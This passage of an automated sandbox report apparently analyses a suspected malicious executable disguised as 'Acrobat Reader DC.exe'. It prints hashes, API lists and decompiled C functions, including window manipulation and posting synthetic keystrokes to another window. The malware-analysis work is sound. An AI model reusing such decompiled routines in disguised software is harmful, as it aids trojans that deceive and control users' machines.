                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: HandleLoadModuleString$Message_wprintf
                                  • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 3648134473-4247470361
                                  • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                  • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                  • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                  • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 81%
                                  			E00441165(void* __edi, void* __esi, int _a4, intOrPtr _a8) {
                                  				signed int _t23;
                                  				int _t32;
                                  				intOrPtr _t33;
                                  				void* _t36;
                                  				struct HWND__* _t37;
                                  				void* _t41;
                                  				struct HWND__** _t42;
                                  
                                  				_t41 = __esi;
                                  				_t36 = __edi;
                                  				_t22 = _a8;
                                  				_t32 = _a4;
                                  				if(_a8 == 0) {
                                  					_t23 =  *0x4a869c; // 0xffffffff
                                  				} else {
                                  					_t23 = E00430C09(_t22, 0x4a8630, _t22);
                                  					 *0x4a869c = _t23;
                                  				}
                                  				if(_t23 != 0xffffffff) {
                                  					_t33 =  *0x4a8690; // 0x0
                                  					_push(_t41);
                                  					_t42 =  *( *(_t33 + _t23 * 4));
                                  					_push(_t36);
                                  					_t37 =  *_t42;
                                  					if(_t42[0xe] != 0) {
                                  						_t42[0xe] = 0;
                                  						if(_t42[0x64] >= 0 && _t42[0x67] != 0) {
                                  							E00440A0D(0x4a8630, _t42, _t42[0x66]);
                                  							_t42[0x67] = 0;
                                  						}
                                  					}
                                  					if(_t32 > 0x43) {
                                  						L24:
                                  						return 1;
                                  					} else {
                                  						switch( *((intOrPtr*)(( *(_t32 + 0x44131d) & 0x000000ff) * 4 +  &M004412F5))) {
                                  							case 0:
                                  								__eax = ShowWindow(__edi, 0);
                                  								_pop(__edi);
                                  								__esi[0xe] = 0;
                                  								_pop(__esi);
                                  								__eax = 1;
                                  								return 1;
                                  								goto L28;
                                  							case 1:
                                  								if(__esi[0xe] != 0) {
                                  									goto L19;
                                  								} else {
                                  									__eax = ShowWindow(__edi, __ebx);
                                  									if(__ebx != 8 && __ebx != 4) {
                                  										__eax = E00434418(__edi);
                                  									}
                                  									_pop(__edi);
                                  									__esi[0xe] = 1;
                                  									_pop(__esi);
                                  									__eax = 1;
                                  									return 1;
                                  								}
                                  								goto L28;
                                  							case 2:
                                  								__esi[0xe] = 1;
                                  								goto L17;
                                  							case 3:
                                  								if(_t42[0xe] == 0) {
                                  									goto L19;
                                  								} else {
                                  									ShowWindow(_t37, _t32);
                                  									E00434418(_t37);
                                  									return 1;
                                  								}
                                  								goto L28;
                                  							case 4:
                                  								L17:
                                  								if(__esi[0xe] == 0) {
                                  									L19:
                                  									return 0;
                                  								} else {
                                  									__eax = ShowWindow(__edi, 6);
                                  									_pop(__edi);
                                  									_pop(__esi);
                                  									__eax = 1;
                                  									return 1;
                                  								}
                                  								goto L28;
                                  							case 5:
                                  								__eax = EnableWindow(__edi, 1);
                                  								_pop(__edi);
                                  								_pop(__esi);
                                  								__eax = 1;
                                  								return 1;
                                  								goto L28;
                                  							case 6:
                                  								__eax = EnableWindow(__edi, 0);
                                  								_pop(__edi);
                                  								_pop(__esi);
                                  								__eax = 1;
                                  								return 1;
                                  								goto L28;
                                  							case 7:
                                  								__esi[0xe] = 1;
                                  								__eax = LockWindowUpdate(__edi);
                                  								_pop(__edi);
                                  								_pop(__esi);
                                  								__eax = 1;
                                  								return 1;
                                  								goto L28;
                                  							case 8:
                                  								__esi[0xe] = 0;
                                  								LockWindowUpdate(0) = InvalidateRect( *__esi, 0, 1);
                                  								goto L24;
                                  							case 9:
                                  								goto L24;
                                  						}
                                  					}
                                  				} else {
                                  					return 0;
                                  				}
                                  				L28:
                                  			}

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                  • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                  • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                  • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 81%
                                  			E00445E52(struct HWND__** _a4, intOrPtr _a8) {
                                  				struct HWND__** _t27;
                                  
                                  				_t27 = _a4;
                                  				E00445AA7( *_t27, 1);
                                  				_push(MapVirtualKeyW(0x25, 0) << 0x00000010 | 0x00000001);
                                  				if(_a8 >= 0) {
                                  					PostMessageW( *_t27, 0x100, 0x27, ??);
                                  					Sleep(0);
                                  					PostMessageW( *_t27, 0x101, 0x27, MapVirtualKeyW(0x25, 0) << 0x00000010 | 0xc0000001);
                                  				} else {
                                  					PostMessageW( *_t27, 0x100, 0x25, ??);
                                  					Sleep(0);
                                  					PostMessageW( *_t27, 0x101, 0x25, MapVirtualKeyW(0x25, 0) << 0x00000010 | 0xc0000001);
                                  				}
                                  				Sleep(0);
                                  				E00445AA7( *_t27, 0);
                                  				return 1;
                                  			}

                                  APIs
                                    • Part of subcall function 00445AA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00445AC7
                                    • Part of subcall function 00445AA7: GetCurrentThreadId.KERNEL32 ref: 00445ACE
                                    • Part of subcall function 00445AA7: AttachThreadInput.USER32(00000000), ref: 00445AD5
                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E6F
                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445E88
                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445E96
                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E9C
                                  • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445EBD
                                  • Sleep.KERNEL32(00000000), ref: 00445ECB
                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445ED1
                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445EE6
                                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445EEE
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                  • String ID:
                                  • API String ID: 2014098862-0
                                  • Opcode ID: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
                                  • Instruction ID: 3cb45b36699f005c3339592b7719367c9fd6f04972b18b3a4454280c1561912d
                                  • Opcode Fuzzy Hash: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
                                  • Instruction Fuzzy Hash: 44115671390300BBF6209B959D8AF5A775DEB98B11F20490DFB80AB1C1C5F5A4418B7C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ClearVariant
                                  • String ID:
                                  • API String ID: 1473721057-0
                                  • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                  • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                  • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                  • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 56%
                                  			E0045EA0F(intOrPtr* _a4, signed int _a8) {
                                  				signed int _v8;
                                  				signed short _v12;
                                  				signed short _v20;
                                  				signed int _v24;
                                  				signed int _v26;
                                  				signed int _v28;
                                  				signed int _v30;
                                  				signed short _v34;
                                  				signed int _v36;
                                  				signed int _v40;
                                  				signed short _v44;
                                  				signed int _v48;
                                  				signed int _v52;
                                  				char _v84;
                                  				signed int _t104;
                                  				signed int _t105;
                                  				intOrPtr* _t120;
                                  				intOrPtr _t129;
                                  				signed short* _t130;
                                  				signed int _t131;
                                  				void* _t137;
                                  
                                  				_t120 = _a4;
                                  				_t130 = _a8;
                                  				_t104 =  *_t130 & 0x0000ffff;
                                  				_t137 = _t104 - 0x4002;
                                  				if(_t137 > 0) {
                                  					_t105 = _t104 - 0x4003;
                                  					if(_t105 > 0x12) {
                                  						goto L55;
                                  					} else {
                                  						switch( *((intOrPtr*)(_t105 * 4 +  &M0045EEBB))) {
                                  							case 0:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi != 0) {
                                  									__edi =  *__esi;
                                  									goto L8;
                                  								}
                                  								goto L9;
                                  							case 1:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi == 0) {
                                  									goto L9;
                                  								} else {
                                  									__fp0 =  *__esi;
                                  									__esi = __ebx;
                                  									_v12 = __fp0;
                                  									__eax = E00408F40(__edi, __ebx);
                                  									__fp0 = _v12;
                                  									 *((intOrPtr*)(__ebx + 8)) = 3;
                                  									 *__ebx = _v12;
                                  									return __eax;
                                  								}
                                  								goto L56;
                                  							case 2:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi == 0) {
                                  									goto L9;
                                  								} else {
                                  									__fp0 =  *__esi;
                                  									__esi = __ebx;
                                  									_v12 = __fp0;
                                  									__eax = E00408F40(__edi, __ebx);
                                  									__fp0 = _v12;
                                  									 *((intOrPtr*)(__ebx + 8)) = 3;
                                  									 *__ebx = _v12;
                                  									return __eax;
                                  								}
                                  								goto L56;
                                  							case 3:
                                  								goto L55;
                                  							case 4:
                                  								goto L20;
                                  							case 5:
                                  								__eflags = _t130[4];
                                  								if(__eflags != 0) {
                                  									_push(0x10);
                                  									 *((intOrPtr*)(_t120 + 8)) = 8;
                                  									_t108 = E004115D7(_t128, _t130, __eflags);
                                  									_push(_t108);
                                  									 *_t120 = _t108;
                                  									__imp__#8();
                                  									 *((short*)( *_t120)) = 9;
                                  									 *((intOrPtr*)( *_t120 + 8)) =  *(_t130[4]);
                                  									_t111 =  *((intOrPtr*)( *_t120 + 8));
                                  									_push(_t111);
                                  									 *((intOrPtr*)( *((intOrPtr*)( *_t111 + 4))))();
                                  								}
                                  								return 1;
                                  								goto L56;
                                  							case 6:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi == 0) {
                                  									goto L9;
                                  								} else {
                                  									__eflags =  *__esi;
                                  									_t100 =  *__esi != 0;
                                  									__eflags = _t100;
                                  									__edx = __edx & 0xffffff00 | _t100;
                                  									_a8 = __dl;
                                  									__eax = _a8;
                                  									return E004530C9(__ebx, _a8);
                                  								}
                                  								goto L56;
                                  							case 7:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi == 0) {
                                  									goto L9;
                                  								} else {
                                  									__ecx = __ebx;
                                  									return E00468070(__ebx, __esi);
                                  								}
                                  								goto L56;
                                  							case 8:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi != 0) {
                                  									__edi =  *__esi;
                                  									goto L8;
                                  								}
                                  								goto L9;
                                  							case 9:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi != 0) {
                                  									__edi =  *__esi & 0x000000ff;
                                  									goto L8;
                                  								}
                                  								goto L9;
                                  							case 0xa:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi != 0) {
                                  									__edi =  *__esi & 0x0000ffff;
                                  									goto L8;
                                  								}
                                  								goto L9;
                                  							case 0xb:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi == 0) {
                                  									goto L9;
                                  								} else {
                                  									__ecx =  *(__esi + 4);
                                  									__edi =  *__esi;
                                  									__esi = __ebx;
                                  									_v8 = __ecx;
                                  									__eax = E00408F40(__edi, __ebx);
                                  									__edx = _v8;
                                  									 *((intOrPtr*)(__ebx + 8)) = 2;
                                  									 *(__ebx + 4) = _v8;
                                  									 *__ebx = __edi;
                                  									return __eax;
                                  								}
                                  								goto L56;
                                  							case 0xc:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi == 0) {
                                  									goto L9;
                                  								} else {
                                  									__edi =  *__esi;
                                  									__eax =  *(__esi + 4);
                                  									goto L15;
                                  								}
                                  								goto L56;
                                  						}
                                  					}
                                  				} else {
                                  					if(_t137 == 0) {
                                  						_t131 = _t130[4];
                                  						if(_t131 != 0) {
                                  							_t129 =  *_t131;
                                  							goto L8;
                                  						}
                                  						goto L9;
                                  					} else {
                                  						if(_t104 > 0x15) {
                                  							L55:
                                  							return 0;
                                  						} else {
                                  							switch( *((intOrPtr*)(_t104 * 4 +  &M0045EE63))) {
                                  								case 0:
                                  									__eax = 0x484ea8;
                                  									return E0040E710(0x484ea8, __ebx, __ecx);
                                  									goto L56;
                                  								case 1:
                                  									__edi =  *(__esi + 8);
                                  									goto L8;
                                  								case 2:
                                  									__edi =  *(__esi + 8);
                                  									goto L8;
                                  								case 3:
                                  									__fp0 =  *(__esi + 8);
                                  									__esi = __ebx;
                                  									_v12 = __fp0;
                                  									__eax = E00408F40(__edi, __ebx);
                                  									__fp0 = _v12;
                                  									 *((intOrPtr*)(__ebx + 8)) = 3;
                                  									 *__ebx = _v12;
                                  									return __eax;
                                  									goto L56;
                                  								case 4:
                                  									__fp0 =  *(__esi + 8);
                                  									__esi = __ebx;
                                  									_v12 = __fp0;
                                  									__eax = E00408F40(__edi, __ebx);
                                  									__fp0 = _v12;
                                  									 *((intOrPtr*)(__ebx + 8)) = 3;
                                  									 *__ebx = _v12;
                                  									return __eax;
                                  									goto L56;
                                  								case 5:
                                  									asm("fild qword [esi+0x8]");
                                  									__esi = __ebx;
                                  									_v12 = __fp0;
                                  									__eax = E00408F40(__edi, __ebx);
                                  									__fp0 = _v12;
                                  									 *__ebx = _v12;
                                  									 *((intOrPtr*)(__ebx + 8)) = 3;
                                  									return __eax;
                                  									goto L56;
                                  								case 6:
                                  									__fp0 =  *(__esi + 8);
                                  									__eax =  &_v36;
                                  									_push( &_v36);
                                  									__esp = __esp - 8;
                                  									 *__esp =  *(__esi + 8);
                                  									__imp__#185();
                                  									__ecx = _v24 & 0x0000ffff;
                                  									__edx = _v26 & 0x0000ffff;
                                  									__eax = _v28 & 0x0000ffff;
                                  									_push(_v24 & 0x0000ffff);
                                  									__ecx = _v30 & 0x0000ffff;
                                  									_push(_v26 & 0x0000ffff);
                                  									__edx = _v34 & 0x0000ffff;
                                  									_push(_v28 & 0x0000ffff);
                                  									__eax = _v36 & 0x0000ffff;
                                  									_push(_v30 & 0x0000ffff);
                                  									_push(__edx);
                                  									__ecx =  &_v84;
                                  									__eax = E0041329B(__edx,  &_v84, L"%4d%02d%02d%02d%02d%02d", _v36 & 0x0000ffff);
                                  									__eax =  &_v84;
                                  									return E0040E710( &_v84, __ebx, __ecx);
                                  									goto L56;
                                  								case 7:
                                  									L20:
                                  									__eflags =  *(__esi + 8);
                                  									if(__eflags == 0) {
                                  										goto L9;
                                  									} else {
                                  										_push(0x10);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										__esp =  &(__esp[2]);
                                  										__eflags = __eax;
                                  										if(__eflags == 0) {
                                  											__eax = 0;
                                  											__eflags = 0;
                                  											 *(__ebx + 0xc) = 0;
                                  											 *((intOrPtr*)(__ebx + 8)) = 4;
                                  											return 0;
                                  										} else {
                                  											__edi =  *(__esi + 8);
                                  											__esi = __eax;
                                  											__eax = E00401B10(__edi, __eax, __eflags);
                                  											 *(__ebx + 0xc) = __eax;
                                  											 *((intOrPtr*)(__ebx + 8)) = 4;
                                  											return __eax;
                                  										}
                                  									}
                                  									goto L56;
                                  								case 8:
                                  									_push(0x10);
                                  									 *((intOrPtr*)(_t120 + 8)) = 8;
                                  									_t116 = E004115D7(_t128, _t130, _t138);
                                  									_push(_t116);
                                  									 *_t120 = _t116;
                                  									__imp__#8();
                                  									_t117 =  *_t120;
                                  									_push(_t130);
                                  									_push(_t117);
                                  									__imp__#10();
                                  									if(_t117 < 0) {
                                  										_push( *_t120);
                                  										__imp__#9();
                                  										_push( *_t120);
                                  										E004111DC();
                                  										 *_t120 = 0;
                                  									}
                                  									return 1;
                                  									goto L56;
                                  								case 9:
                                  									goto L55;
                                  								case 0xa:
                                  									__eflags =  *(__esi + 8);
                                  									_t43 =  *(__esi + 8) != 0;
                                  									__eflags = _t43;
                                  									__ecx = __ecx & 0xffffff00 | _t43;
                                  									_a8 = __cl;
                                  									__edx = _a8;
                                  									return E004530C9(__ebx, _a8);
                                  									goto L56;
                                  								case 0xb:
                                  									__eax =  *(__esi + 4);
                                  									__ecx =  *(__esi + 8);
                                  									__edx =  *__esi;
                                  									_v48 =  *(__esi + 4);
                                  									__eax =  &_v20;
                                  									_v44 =  *(__esi + 8);
                                  									_v52 =  *__esi;
                                  									__edx =  *(__esi + 0xc);
                                  									_push( &_v20);
                                  									__ecx =  &_v52;
                                  									_push( &_v52);
                                  									_v40 =  *(__esi + 0xc);
                                  									__imp__#220();
                                  									__fp0 = _v20;
                                  									__esi = __ebx;
                                  									_v12 = _v20;
                                  									__eax = E00408F40(__edi, __ebx);
                                  									__fp0 = _v12;
                                  									 *__ebx = _v12;
                                  									 *((intOrPtr*)(__ebx + 8)) = 3;
                                  									return __eax;
                                  									goto L56;
                                  								case 0xc:
                                  									__edi =  *(__esi + 8);
                                  									goto L8;
                                  								case 0xd:
                                  									__edi =  *(__esi + 8) & 0x000000ff;
                                  									goto L8;
                                  								case 0xe:
                                  									__edi =  *(__esi + 8) & 0x0000ffff;
                                  									L8:
                                  									E00408F40(_t129, _t120);
                                  									 *((intOrPtr*)(_t120 + 8)) = 1;
                                  									 *_t120 = _t129;
                                  									L9:
                                  									return 1;
                                  									goto L56;
                                  								case 0xf:
                                  									__edi =  *(__esi + 8);
                                  									__eax =  *(__esi + 0xc);
                                  									L15:
                                  									__esi = __ebx;
                                  									_v8 = __eax;
                                  									__eax = E00408F40(__edi, __ebx);
                                  									__ecx = _v8;
                                  									 *((intOrPtr*)(__ebx + 8)) = 2;
                                  									 *(__ebx + 4) = _v8;
                                  									 *__ebx = __edi;
                                  									return __eax;
                                  									goto L56;
                                  								case 0x10:
                                  									__edx =  *(__esi + 0xc);
                                  									__edi =  *(__esi + 8);
                                  									__esi = __ebx;
                                  									_v8 = __edx;
                                  									__eax = E00408F40(__edi, __ebx);
                                  									__eax = _v8;
                                  									 *(__ebx + 4) = __eax;
                                  									 *((intOrPtr*)(__ebx + 8)) = 2;
                                  									 *__ebx = __edi;
                                  									return __eax;
                                  									goto L56;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L56:
                                  			}
























                                  0x0045ed9c
                                  0x0045ed9c
                                  0x00000000
                                  0x00000000
                                  0x0045ed9f
                                  0x0045eda2
                                  0x0045eda4
                                  0x00000000
                                  0x0045edaa
                                  0x0045edaa
                                  0x0045edac
                                  0x00000000
                                  0x0045edac
                                  0x00000000
                                  0x00000000
                                  0x0045eccd
                                  0x0045ea2c
                                  0x0045ea2c
                                  0x0045ecac
                                  0x0045ecb1
                                  0x0045ecb7
                                  0x00000000
                                  0x0045ecb7
                                  0x00000000
                                  0x0045ea32
                                  0x0045ea35
                                  0x0045ee5a
                                  0x0045ee60
                                  0x0045ea3b
                                  0x0045ea3b
                                  0x00000000
                                  0x0045ec97
                                  0x0045eca9
                                  0x00000000
                                  0x00000000
                                  0x0045eab4
                                  0x00000000
                                  0x00000000
                                  0x0045eac0
                                  0x00000000
                                  0x00000000
                                  0x0045eb19
                                  0x0045eb1c
                                  0x0045eb1e
                                  0x0045eb21
                                  0x0045eb26
                                  0x0045eb29
                                  0x0045eb30
                                  0x0045eb3a
                                  0x00000000
                                  0x00000000
                                  0x0045eb3d
                                  0x0045eb40
                                  0x0045eb42
                                  0x0045eb45
                                  0x0045eb4a
                                  0x0045eb4d
                                  0x0045eb54
                                  0x0045eb5e
                                  0x00000000
                                  0x00000000
                                  0x0045eb61
                                  0x0045eb64
                                  0x0045eb6c
                                  0x0045eb6f
                                  0x0045eb74
                                  0x0045eb77
                                  0x0045eb79
                                  0x0045eb88
                                  0x00000000
                                  0x00000000
                                  0x0045ebf9
                                  0x0045ebfc
                                  0x0045ebff
                                  0x0045ec00
                                  0x0045ec03
                                  0x0045ec06
                                  0x0045ec0c
                                  0x0045ec10
                                  0x0045ec14
                                  0x0045ec18
                                  0x0045ec19
                                  0x0045ec1d
                                  0x0045ec1e
                                  0x0045ec22
                                  0x0045ec23
                                  0x0045ec27
                                  0x0045ec28
                                  0x0045ec2a
                                  0x0045ec33
                                  0x0045ec3b
                                  0x0045ec4b
                                  0x00000000
                                  0x00000000
                                  0x0045eb8b
                                  0x0045eb8b
                                  0x0045eb8f
                                  0x00000000
                                  0x0045eb95
                                  0x0045eb95
                                  0x0045eb97
                                  0x0045eb9c
                                  0x0045eb9f
                                  0x0045eba1
                                  0x0045ebc2
                                  0x0045ebc2
                                  0x0045ebc4
                                  0x0045ebc7
                                  0x0045ebd6
                                  0x0045eba3
                                  0x0045eba3
                                  0x0045eba6
                                  0x0045eba8
                                  0x0045ebad
                                  0x0045ebb0
                                  0x0045ebbf
                                  0x0045ebbf
                                  0x0045eba1
                                  0x00000000
                                  0x00000000
                                  0x0045ea42
                                  0x0045ea44
                                  0x0045ea4b
                                  0x0045ea53
                                  0x0045ea54
                                  0x0045ea56
                                  0x0045ea5c
                                  0x0045ea5e
                                  0x0045ea5f
                                  0x0045ea60
                                  0x0045ea68
                                  0x0045ea6c
                                  0x0045ea6d
                                  0x0045ea75
                                  0x0045ea76
                                  0x0045ea7e
                                  0x0045ea7e
                                  0x0045ea8c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0045ebd9
                                  0x0045ebde
                                  0x0045ebde
                                  0x0045ebde
                                  0x0045ebe1
                                  0x0045ebe4
                                  0x0045ebf6
                                  0x00000000
                                  0x00000000
                                  0x0045ec4e
                                  0x0045ec51
                                  0x0045ec54
                                  0x0045ec56
                                  0x0045ec59
                                  0x0045ec5c
                                  0x0045ec5f
                                  0x0045ec62
                                  0x0045ec65
                                  0x0045ec66
                                  0x0045ec69
                                  0x0045ec6a
                                  0x0045ec6d
                                  0x0045ec73
                                  0x0045ec76
                                  0x0045ec78
                                  0x0045ec7b
                                  0x0045ec80
                                  0x0045ec83
                                  0x0045ec85
                                  0x0045ec94
                                  0x00000000
                                  0x00000000
                                  0x0045ea8f
                                  0x00000000
                                  0x00000000
                                  0x0045eaae
                                  0x00000000
                                  0x00000000
                                  0x0045eaba
                                  0x0045ea93
                                  0x0045ea95
                                  0x0045ea9a
                                  0x0045eaa1
                                  0x0045eaa3
                                  0x0045eaab
                                  0x00000000
                                  0x00000000
                                  0x0045eac5
                                  0x0045eac8
                                  0x0045eacb
                                  0x0045eacb
                                  0x0045eacd
                                  0x0045ead0
                                  0x0045ead5
                                  0x0045ead8
                                  0x0045eadf
                                  0x0045eae2
                                  0x0045eaec
                                  0x00000000
                                  0x00000000
                                  0x0045eaef
                                  0x0045eaf2
                                  0x0045eaf5
                                  0x0045eaf7
                                  0x0045eafa
                                  0x0045eaff
                                  0x0045eb02
                                  0x0045eb05
                                  0x0045eb0c
                                  0x0045eb16
                                  0x00000000
                                  0x00000000
                                  0x0045ea3b
                                  0x0045ea35
                                  0x0045ea2c
                                  0x00000000

                                  APIs
                                  • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                  • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                  • VariantClear.OLEAUT32 ref: 0045EA6D
                                  • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                  • __swprintf.LIBCMT ref: 0045EC33
                                  • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                  Strings
                                  • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                  • String ID: %4d%02d%02d%02d%02d%02d
                                  • API String ID: 2441338619-1568723262
                                  • Opcode ID: 707bb89b8c24df81e4b6e45c7c0240a94ced01312171e31af911b1112949458a
                                  • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                  • Opcode Fuzzy Hash: 707bb89b8c24df81e4b6e45c7c0240a94ced01312171e31af911b1112949458a
                                  • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E004091B0(void* __edx, void* __fp0, char _a4) {
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				signed int _v20;
                                  				char _v24;
                                  				signed int* _v28;
                                  				char _v32;
                                  				signed int _v36;
                                  				char _v40;
                                  				short _v42;
                                  				short _v44;
                                  				char _v52;
